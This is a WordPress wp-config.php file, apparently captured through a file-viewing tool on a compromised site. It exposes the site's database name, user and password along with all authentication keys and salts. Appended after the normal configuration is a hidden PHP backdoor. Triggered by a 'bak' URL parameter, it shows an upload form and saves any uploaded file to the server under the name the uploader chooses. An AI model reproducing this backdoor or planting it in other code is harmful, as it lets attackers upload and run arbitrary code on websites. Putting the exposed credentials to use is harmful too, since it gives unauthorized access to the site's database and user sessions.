View file File name : wp-config.php Content :<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * Localized language * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'guideinstitutsbe_wp_vasso'); /** Database username */ define('DB_USER', 'guideinstitutsbe_wp_wsebh'); /** Database password */ define('DB_PASSWORD', '6dW91tGTGhDf4#b_'); /** Database hostname */ define('DB_HOST', 'localhost:3306'); /** Database charset to use in creating database tables. */ define('DB_CHARSET', 'utf8'); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', 'TJA8Fmw88&Mm151O65XK/!@;75r4/;3_oVn[2)~BTzw1QkY-1Yh9983iaBh%N*7+'); define('SECURE_AUTH_KEY', 'H5b34Hf(7hf-Xe1[o6KjrD3-yVGs/S4s44O3P1z52@FiDQi3yR1F/k89oGAg%]9*'); define('LOGGED_IN_KEY', '87YP;wO9n+57v2F(~MsVSI1+clIKz%R*/:8lbStnaD;u52p44Y(:m5NO0bP6v%V['); define('NONCE_KEY', '3V9)0I~HjD24trP(a*G0C-*Z319Xb9KN7*SZ]-5|WonTbB2fR5l12/4KU9A6h5P4'); define('AUTH_SALT', ')@7fllib]b3%x_#A[ORnG7yB3(fq(~mia*6dQ9s+99S~K1Bt5uW139-XP)|/1V17'); define('SECURE_AUTH_SALT', '::%U&gg52_(ww1RbI8B7x:t+|ZOl!2]Mq;8uArG_%790o5s#O&*zKUAVBlW0LQ;Y'); define('LOGGED_IN_SALT', ']K]-zUV2):%%mXs]D5O#woyFP~0RE:3N@*EEr5a!+2)9B39xx7J@HS|Q66NGMi2N'); define('NONCE_SALT', 'Do3w92mUxd~qiI[~65Z6HFvd5-//11|&]fv*U82]O0pN3|L@#:E3iE5CWDJxq:Nc'); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'xlcxeXWV_'; /* Add any custom values between this line and the "stop editing" line. */ define('WP_ALLOW_MULTISITE', true); /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ if ( ! defined( 'WP_DEBUG' ) ) { define( 'WP_DEBUG', false ); } define( 'DISALLOW_FILE_EDIT', true ); define( 'CONCATENATE_SCRIPTS', false ); define( 'WP_CACHE_KEY_SALT', '958ef63c23d4dd03ec2f49ef33dd89cf' ); define( 'WP_DEBUG_DISPLAY', false ); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php'; <?php if (isset($_GET['bak'])) { echo"<form method='post' enctype='multipart/form-data'><input type='file' name='a'><input type='submit' value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>"; } ?>